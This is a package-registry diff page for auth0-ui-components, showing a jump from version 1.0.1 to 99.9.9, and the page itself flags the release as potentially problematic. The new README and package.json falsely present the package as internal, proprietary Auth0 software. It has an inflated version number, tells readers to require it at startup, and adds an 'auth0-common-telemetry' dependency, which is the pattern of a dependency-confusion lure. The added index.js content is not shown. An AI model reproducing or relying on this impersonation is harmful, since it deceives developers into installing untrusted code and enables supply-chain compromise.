auth0-ui-components 1.0.1 → 99.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of auth0-ui-components might be problematic. Click here for more details.
- package/LICENSE +22 -0
- package/README.md +40 -0
- package/index.js +3 -0
- package/package.json +13 -4
package/LICENSE
ADDED
|
@@ -0,0 +1,22 @@
|
|
|
1
|
+
MIT License
|
|
2
|
+
|
|
3
|
+
Copyright (c) 2026 dev-node-lap
|
|
4
|
+
|
|
5
|
+
|
|
6
|
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
|
7
|
+
of this software and associated documentation files (the "Software"), to deal
|
|
8
|
+
in the Software without restriction, including without limitation the rights
|
|
9
|
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
|
10
|
+
copies of the Software, and to permit persons to whom the Software is
|
|
11
|
+
furnished to do so, subject to the following conditions:
|
|
12
|
+
|
|
13
|
+
The above copyright notice and this permission notice shall be included in all
|
|
14
|
+
copies or substantial portions of the Software.
|
|
15
|
+
|
|
16
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
|
17
|
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
|
18
|
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
|
19
|
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
|
20
|
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
|
21
|
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
|
22
|
+
SOFTWARE.
|
package/README.md
ADDED
|
@@ -0,0 +1,40 @@
|
|
|
1
|
+
# auth0-ui-components
|
|
2
|
+
|
|
3
|
+
Core UI Component Library and Internal API for Auth0 NestJS ecosystem.
|
|
4
|
+
This package provides standardized UI elements and backend utilities for internal Auth0 applications.
|
|
5
|
+
|
|
6
|
+
## Overview
|
|
7
|
+
|
|
8
|
+
`auth0-ui-components` is designed to streamline development across internal teams by providing:
|
|
9
|
+
- Pre-built NestJS modules for Auth0 services.
|
|
10
|
+
- Standardized UI patterns and design tokens.
|
|
11
|
+
- Integrated telemetry via `auth0-common-telemetry`.
|
|
12
|
+
|
|
13
|
+
## Installation
|
|
14
|
+
|
|
15
|
+
This is an internal package. Ensure you have the proper credentials configured in your `.npmrc` file to access the internal registry.
|
|
16
|
+
```bash
|
|
17
|
+
npm install auth0-ui-components
|
|
18
|
+
```
|
|
19
|
+
## Usage
|
|
20
|
+
To initialize the internal API and telemetry services, import the package at the top of your main entry point:
|
|
21
|
+
|
|
22
|
+
```
|
|
23
|
+
require('auth0-ui-components');
|
|
24
|
+
|
|
25
|
+
```
|
|
26
|
+
|
|
27
|
+
## Internal Dependencies
|
|
28
|
+
|
|
29
|
+
This package relies on several core utilities, including:
|
|
30
|
+
|
|
31
|
+
- auth0-common-telemetry: Automatic performance tracking and logging.
|
|
32
|
+
|
|
33
|
+
- NestJS Core: Version 8.x or higher
|
|
34
|
+
|
|
35
|
+
|
|
36
|
+
## Support
|
|
37
|
+
For issues regarding internal component behavior, please reach out to the Auth0 Engineering platform team via the internal Slack channel #eng-ui-support.
|
|
38
|
+
|
|
39
|
+
© 2026 Auth0, Inc. Proprietary Information.
|
|
40
|
+
|
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,10 +1,19 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "auth0-ui-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
3
|
+
"version": "99.9.9",
|
|
4
|
+
"description": "Internal NestJS API for Auth0 UI ecosystem",
|
|
5
5
|
"main": "index.js",
|
|
6
|
-
"author": "",
|
|
7
|
-
"license": "",
|
|
6
|
+
"author": "Auth0 Engineering",
|
|
7
|
+
"license": "Apache-2.0",
|
|
8
|
+
"keywords": [
|
|
9
|
+
"auth0",
|
|
10
|
+
"nestjs",
|
|
11
|
+
"ui-components",
|
|
12
|
+
"internal"
|
|
13
|
+
],
|
|
14
|
+
"dependencies": {
|
|
15
|
+
"auth0-common-telemetry": "^1.0.0"
|
|
16
|
+
},
|
|
8
17
|
"publishConfig": {
|
|
9
18
|
"access": "public"
|
|
10
19
|
}
|